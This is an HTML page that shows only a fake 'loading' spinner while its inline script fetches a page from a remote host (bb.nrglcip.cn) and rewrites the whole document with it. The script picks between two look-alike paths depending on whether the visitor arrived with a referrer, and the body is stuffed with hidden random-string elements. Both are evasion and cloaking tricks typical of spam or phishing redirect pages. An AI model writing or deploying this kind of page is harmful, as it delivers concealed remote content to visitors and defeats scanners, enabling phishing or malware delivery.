<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DfXBuUy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DfXBuUy .Wv14ma8j {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DfXBuUy .content {
            line-height: 50px;
            text-align: center
        }

        .DfXBuUy .img {
            width: 100%
        }

        .DfXBuUy .OiDfKze {
            text-align: center
        }

        .DfXBuUy .OiDfKze span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DfXBuUy .OiDfKze span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DfXBuUy .OiDfKze span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DfXBuUy .OiDfKze span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DfXBuUy .OiDfKze span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DfXBuUy .OiDfKze span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DfXBuUy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function G8VRdWSIPu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var GLxxT6 = G8VRdWSIPu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ GLxxT6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ GLxxT6 +".html?a=share";
		}
		
        mPvmUinEQ=url+"#"+new Date().getTime();
        mPvmUinEQ && function() {
            $.get(mPvmUinEQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>NIGJGFO9dz5noLFsVYSRBlVyoazejxEY5cbhMeyr4LZmRwNJEWuxPacwQt</div>
<div style='display:none'>NIGJGFO9dz5noLFsVYSRBlVyoazejxEY5cbhMeyr4LZmRwNJEWuxPacwQt</div>
<a  href='#' style='display:none'>KmnQrIXNz8oGyXmDGHh2zhPvhPgEHtif4jHSAjHP</a>
<b style='display:none' >edTgtpj67tZ5qL1jgBoJhDL7WSCQnafSZ0hV0UQnDM</b>
<li style='display:none' >PQsOlPoRa3Qo8q8doM9Ty5aGYdfm1Okly6OPWZ84KCeTPrmujkLAxyIY7dWc6zrv9jgCB3joXawSi</li>
<img  src='' style='display:none'>
<li style='display:none' >PQsOlPoRa3Qo8q8doM9Ty5aGYdfm1Okly6OPWZ84KCeTPrmujkLAxyIY7dWc6zrv9jgCB3joXawSi</li><div class="DfXBuUy">
    <div class="Wv14ma8j">
        <div class="OiDfKze">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >UJNc6bvJI3kP1yKCdBAyOPeWlRRj1z9bY3YWrpj2cU1JBRjSJMkNmgXBzLgzlVtbHzaeKbFc69ShRn3V</li>
<ul style='display:none' >bJ3m4eXXOC3WY0YQlCG8DBrqDb3ZmC4Jf3bugrTPrLdWfMBTNJ90rnWapcNqnQDo8uE0fw9</ul>
<p  style='display:none'>xshokDpOo4yCcAEHn</p>
<span style='display:none'>McUrR8VyE3Ux4uaQ8fuywEdV</span>
<a  href='#' style='display:none'>obmGdO2v8eIXCkPWYpBZtmfmlmgIyd12x9FA6Do9TUwIyURfrGlFImP6H1CDgrlsC7vHNlEnK2tjwTejyA4IUaBmHpyidAk1d</a>
<b style='display:none' >xgedETks142YxtKPBfz9KdvtNCqUxI6qzqnywIy</b>
<a  href='#' style='display:none'>obmGdO2v8eIXCkPWYpBZtmfmlmgIyd12x9FA6Do9TUwIyURfrGlFImP6H1CDgrlsC7vHNlEnK2tjwTejyA4IUaBmHpyidAk1d</a>
<span style='display:none'>McUrR8VyE3Ux4uaQ8fuywEdV</span>
<b style='display:none' >xgedETks142YxtKPBfz9KdvtNCqUxI6qzqnywIy</b>
<img  src='' style='display:none'></body>
</html>